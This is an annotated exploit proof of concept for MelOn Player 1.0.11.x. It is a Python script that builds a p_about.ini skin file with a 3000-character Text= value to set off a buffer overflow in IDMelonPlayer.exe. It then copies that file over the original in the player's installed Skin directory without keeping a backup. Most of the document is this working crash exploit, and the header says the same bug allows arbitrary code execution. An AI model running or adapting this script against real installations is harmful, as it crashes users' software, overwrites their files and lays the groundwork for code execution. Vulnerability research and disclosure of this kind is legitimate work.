# Exploit Title: MelOn Player 1.0.11.x Denial of Service POC
# Date: 09/09/2011
# Author: modpr0be
# Software Link: http://www.melon.co.id/cs/guide/download/player.do
# Vulnerable version: 1.0.11.x
# Tested on: Windows XP SP3 (VirtualBox 4.1.0 r73009)
# CVE : N/A
# Thanks: offsec, exploit-db, corelan-team, 5M7X, loneferret, mr_me, _sinner

#### Software description:
# Melon Player is a well-known application in Indonesia for playing songs provided by
# the Melon portal (http://www.melon.co.id). It can play music file
# types such as mp3, wav, wma, mp4, and others. The player can also play
# files on your local computer or stream them online from the Melon portal.
# Songs can also be downloaded to your local computer.
#
#### Vulnerable information:
# The main program (IDMelonPlayer.exe) suffers from a buffer overflow vulnerability
# when opening the p_about.ini file. (Note: p_about.ini is a configuration file that
# is part of the skin template. It carries the program information and can be
# reached from the menu (Menu → Information).) The overflow is the result of adding
# extra bytes to parts of the file (Text section), giving an attacker the possibility
# of arbitrary code execution on a system that has Melon Player installed.
#
### Some Conditions:
# This is just the POC; it will only crash the program,
# and it's unicode ;)
#
##

#!/usr/bin/python
import os,sys,shutil,time
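# Leading part of the skin template that is written to p_about.ini: the
# [MAIN], [MAINBG], [MAINMASK], [BUTTON_n], [STATIC_1] and [TEXT_1] sections.
# None of these entries is modified by the PoC; they are here so the generated
# file still looks like a regular skin file to the player.
# The listing this was taken from had stray "|" lines between every template
# line; they are dropped here so the literal holds only INI content.
# NOTE(review): the "??" values in the Name= entries look like non-ASCII text
# lost in transcoding - confirm against an original skin file.
header=("""[MAIN]
MainStyle=SKIN
Resize=NO
Mask=YES
BGStyle=IMAGE
DefSize=0,0,427,136
Image=skin.bmp
Button=2
Slider=
Static=1
Text=4
Edit=
Combo=


[MAINBG]
TopLeft=145,389,6,21
TopCenter=153,389,11,21
TopRight=166,389,6,21
MiddleLeft=145,412,6,21
MiddleCenter=153,412,11,21
MiddleRight=166,412,6,21
BottomLeft=145,435,6,34
BottomCenter=153,435,11,34
BottomRight=166,435,6,34

[MAINMASK]
TopLeft=174,389,10,10
TopCenter=185,389,10,10
TopRight=196,389,10,10
MiddleLeft=185,389,10,10
MiddleCenter=185,389,10,10
MiddleRight=185,389,10,10
BottomLeft=174,400,10,10
BottomCenter=185,389,10,10
BottomRight=196,400,10,10


[BUTTON_1]
Name=??
ID=1001
ResizeStyle=TOP_LEFT
Tooltip=
CheckBox=FALSE
Position=410,4,13,13
NormalRect=223,389,13,13
OverRect=238,389,13,13
DownRect=253,389,13,13
DisabledRect=223,389,13,13
MaskRect=2000,0,13,13

[BUTTON_2]
Name=??
ID=1002
ResizeStyle=TOP_LEFT
Tooltip=
CheckBox=FALSE
Position=173,105,80,20
NormalRect=0,763,80,20
OverRect=0,763,80,20
DownRect=81,763,80,20
DisabledRect=162,763,80,20
MaskRect=2000,0,80,20


[STATIC_1]
Name=???_??
ID=2001
Position=20,31,72,84
TopLeft=14,478,72,84
TopCenter=
TopRight=
MiddleLeft=
MiddleCenter=
MiddleRight=
BottomLeft=
BottomCenter=
BottomRight=


[TEXT_1]
Name=popup Name sdw
ID=3701
Position=2,2,420,14
Text=MelOn Player
Font=Arial
FontSize=12
FontBold=
Align=CENTER
FontColor=0,0,0
""")
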
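# Trailing part of the skin template: the unmodified [TEXT_3] and [TEXT_4]
# sections that follow the oversized [TEXT_2] entry in the generated file.
# The stray "|" lines that the listing interleaved with the template are
# removed so the literal holds only INI content.
# NOTE(review): "Name=????" looks like non-ASCII text lost in transcoding -
# confirm against an original skin file.
footer=("""
[TEXT_3]
Name=????
ID=3703
Position=104,50,243,14
Text=Melon Player Version 1.0.0.101102
Font=Arial
FontSize=12
FontBold=
Align=
FontColor=0,0,0

[TEXT_4]
Name=Copyright
ID=3704
Position=104,72,303,14
Text=Copyright PT. Melon Indonesia. All Right Reserved.
Font=Arial
FontSize=12
FontBold=
Align=
FontColor=0,0,0
""")
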
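# Name of the skin configuration file the PoC generates; it is created in the
# current working directory.
filename = "p_about.ini"
# Absolute path of that generated file, used as the copy source and in the
# status output.
splash = os.path.abspath(filename)
# Hard-coded Skin directory the script expects the player to be installed in.
# Written as a raw string: the backslashes in the original literal only
# survived because \P, \M and \S are not recognised escapes, which newer
# Python versions warn about. The resulting value is unchanged.
skindir = r"C:\Program Files\MelonPlayerID\Skin"
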
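# Filler for the oversized field: 3000 "A" characters. The page does not state
# the size of the buffer being overrun, so 3000 is simply the length the
# author chose to make the player crash.
junk = "A" * 3000

# The [TEXT_2] section with the filler placed in its Text= value, where the
# stock sections carry a short caption. Per the header notes this is the entry
# that crashes IDMelonPlayer.exe when the file is loaded. For triage, a skin
# .ini whose Text= value is far longer than a caption is the thing to look for.
# The literal ends with an explicit CR LF, kept as in the original; the stray
# "|" lines that the listing interleaved with the template are removed.
buggy=("""
[TEXT_2]
Name=popup Name
ID=3702
Position=3,3,420,14
Text="""+junk+ """
Font=Arial
FontSize=12
FontBold=
Align=CENTER
FontColor=170,170,170\r\n""")
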
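# Banner printed once the PoC file has been written. The "|" between the two
# names on the third line is part of the author's text; the stray "|" lines
# that the listing interleaved with the banner are removed.
banner=("""
[*] MelOnPlayer 1.0.11.x Denial of Service POC
[*] modpr0be[at]spentera[dot]com.
[*] thanks a lot: cyb3r.anbu | otoy :)
=====================================================
""")
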
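# Write the PoC skin file and copy it into the player's Skin directory.
#
# Changes from the original listing:
#  - indentation restored (the listing had flattened every line to column 0);
#  - the output file is opened only after the platform and directory checks,
#    so a run that bails out early no longer leaves an empty p_about.ini and
#    an unclosed handle behind;
#  - the handle is managed by `with`, and no longer shadows the builtin `file`;
#  - print calls take a single pre-formatted string, so the output is the same
#    text under Python 2 and Python 3.
if os.name != 'nt':
    print("[-] Please run this script on Windows.")
    sys.exit()

if not os.path.isdir(skindir):
    print("[-] Could not find Skin directory, is MelOn Player installed?")
    sys.exit()

try:
    # Text mode, as in the original.
    with open(filename, 'w') as poc_file:
        poc_file.write(header+buggy+footer)
    print(banner)
    print("[*] Creating the malicious .ini file..")
    time.sleep(2)  # cosmetic pause kept from the original
    print("[*] Malicious file (POC) %s created.." % filename)
    print("[*] Path: %s" % splash)
    # copy2 replaces any p_about.ini already in the Skin directory and makes
    # no backup, so the installation keeps the modified file until the
    # original is restored by hand or by reinstalling the skin.
    shutil.copy2(splash,skindir)
    print("[*] File %s has been copied to %s" % (filename, skindir))
except IOError:
    print("[-] Could not write to destination folder, check permission..")
    sys.exit()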